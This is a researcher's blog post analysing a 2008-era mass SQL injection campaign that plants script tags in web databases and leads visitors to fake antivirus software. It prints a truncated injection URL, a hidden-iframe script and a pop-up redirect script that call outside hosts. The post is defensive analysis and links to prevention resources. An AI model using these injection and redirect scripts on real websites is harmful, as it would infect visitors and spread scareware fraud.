I was talking yesterday with a fellow researcher about the Win32/Danmec trojan and the way it uses SQL injection to extend its bot network when I just realized that I was actually looking through some of the injected webpages. I decided to find more about it so I backtracked the events to see how the injection occurs and where it may potentially lead. This is what I discovered, in short.

Everything start with attacks against web servers, searching for victims. This is done by running queries like:

http://www.targetedwebserver.com/page.asp?arg=val; DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445... %20AS%20VARCHAR(4000));EXEC(@S);-

What this actually does is de-cast-ing(the payload is hidden to prevent Intrusion Detection Systems from detecting anything) and executing an SQL query that loops through all user tables and all ntext, text, nvarchar and varchar columns and appends to these a tiny piece of html code that looks like this:

<script src=http://domain1/b.js></script>

I was curious to see what a live search for ";DECLARE%20@S%20" will reveal. Well, you can check it out for yourself and draw appropriate conclusions(please notice that there are 9,010 results which may not all be related to what I'm looking for but it's safe to assume that many of them are):

Search results

By following the link of the .js file(most probably hosted on a botnet machine) I can show you the contents of it:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://domain2/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

From the above I can see that an invisible iframe is added to the infected webpage. The iframe points to a malicious webpage that will either redirect to a page full of exploits to install more malware or to http://domain/ad.js which is the following:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatead=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "updatead=update;expires="+expires.toGMTString();
try{
if((navigator.userLanguage.toLowerCase() == "en-us")||(if(navigator.userLanguage.toLowerCase() == "en"))) {
w=window.open("hxxp: //domain.com?wmid=1041&l=14&it=1&s=4t","w","location=0,status=0,toolbar=0,menubar=0,directories=0,resizable=0,scrollbars=0,width=750,height=770");
w.moveTo(0,0);
}
}
catch(e)
{
};
}

Now I really arrived where I wanted to. The above script will redirect the user to a page hosting the potentially unwanted antivirus software. From now on we start dealing with "potentially unwanted" security products. Yes, you've guessed it: the authors went to all this trouble to be able to advertise these so-called AV products. But this is not your regular ad because what this page actually does is displaying a fake, kind of elaborate, antivirus scan of the user's computer and of course that no security product is good if it doesn't detect some malware unknown to the user. Just take a look at these snapshots:

Fake security UI

Fake security pop-up

Now, if the user is fooled by this he will click the page (just choose your favourite area, anything will do) and download an installer for this "potentially unwanted" product (be advised that the image above is not the genuine security center from Windows).

So, in case you were looking for another reason behind all these SQL attack that you read in everybody's blogs, besides password stealing and setting up botnets, you have it: to spread fake security applications, for which users pay a lot and receive virtually nothing.

Marian RADU

PS: Here are some resources on preventing these sorts of issues from impacting your website:

http://www.microsoft.com/technet/security/advisory/954462.mspx
http://blogs.technet.com/msrc/archive/2008/06/24/rise-in-sql-injection-attacks-exploiting-unverified-user-data-input.aspx
http://blogs.technet.com/swi/archive/2008/06/24/new-tools-to-block-and-eradicate-sql-injection.aspx